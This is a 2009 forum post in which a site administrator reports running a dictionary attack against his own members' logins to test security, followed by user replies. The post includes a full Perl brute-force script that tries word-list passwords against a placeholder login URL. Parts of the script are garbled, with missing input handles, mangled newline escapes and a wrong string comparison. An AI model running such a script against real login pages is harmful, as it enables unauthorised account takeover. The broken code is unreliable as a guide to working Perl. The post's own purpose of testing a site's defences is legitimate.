Forum > Blogs > Congratulations Members of The VG Press
Congratulations Members of The VG Press
avatar
Country: US
Comments: 6470
News Posts: 413
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:06:40
0
You have officially passed the stupid password test!


I have been working on a couple security improvements for the site relating to login and authentication.  Primarily on a policy to handle failed logins and bot attacks.  Doing so necessitates the testing thereof, and I have thusly created a script to perform a dictionary attack.


A dictionary attack is very simple; a program tries repeatedly to log into an account using a list of words, often a dictionary as words are commonly used as passwords due to that they're easily remembered.


So what does this have to do with you, a loyal VG Press user?  Well, contrary to what you may think, I have no idea what your password is!  Every password is one-way encrypted before being sent to the server, then salted and hashed once more for good measure, so I can only see a garbled mess in the database.


So I set loose my script using a list of the 500 worst passwords that alledgedly encompasses the passwords of 1 in every 9 users.


But every active VG Press member has a password that is not on the list of the 500 worst.  Hoorah!



BONUS SECTION


For those interested in the code being the attack, it was written in Perl.  As to not needlessly give a program to do this to a live site, this isn't the exact program, but it's effectively the same.

 
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

$file = "dictionary.txt";
open FILE, $file or die $!;
print "Enter Username: ";
my $input = ;
$username = substr $input, 0, (length $input)-1;
while(my $line = )
{
  $word = substr $line, 0, (length $line)-1;
  do
    {
        $ua = LWP::UserAgent->new;
        $ua->timeout(3);
        my $req = (POST 'http://insecuresite.com/login',  
["username" => $username,
"password" => $word]);
        $response = $ua->request($req);
        $content = $response->content;
    }
    while($content == "500 read timeout");

    if(!(length $content > 0))
    {
        print "PASSWORD: $wordn";
        exit;
    }
}
close FILE;
print "No matches foundn";
exit;

---

Tell me to get back to rewriting this site so it's not horrible on mobile
avatar
Country: CA
Comments: 654
News Posts: 6
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:20:45
0
So are you implimenting a "Too many failed logins!" functionality into the site, or what do you plan on doing to counteract dictionary/script attacks like these and others?

avatar
Country: US
Comments: 6470
News Posts: 413
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:39:44
0
The likely solution is going to be exponentially increasing minimum time period between log-in attempts based on IP address.

---

Tell me to get back to rewriting this site so it's not horrible on mobile
avatar
Country: UN
Comments: 16255
News Posts: 1043
Joined: 2008-06-21
 
Sat, 07 Mar 2009 05:43:17
0
Damn, I was hoping that password would be number!

avatar
Country: UN
Comments: 19375
News Posts: 9398
Joined: 2008-08-18
 
Sat, 07 Mar 2009 08:12:18
0

Fuckin' A man!

avatar
Country: GB
Comments: 48515
News Posts: 59786
Joined: 2008-06-21
 
Sun, 08 Mar 2009 11:22:33
0
I made my password specifically because I thought you could see it Yo. Sad

avatar
Country: CA
Comments: 97
News Posts: 1
Joined: 2008-06-25
 
Tue, 10 Mar 2009 01:01:26
0
Then it's a good thing I recently changed my password from "pussy" to something else. WinkWink
avatar
Country: UN
Comments: 17323
News Posts: 2811
Joined: 2008-06-21
 
Tue, 10 Mar 2009 20:48:41
0
Those 500 worst passwords are pretty funny. LOL Thankfully, mines not even close to anything on that list. Happy

The VG Press

Log in or Register for free to comment
Recently Spotted:
*crickets*
Login @ The VG Press
Username:
Password:
Remember me?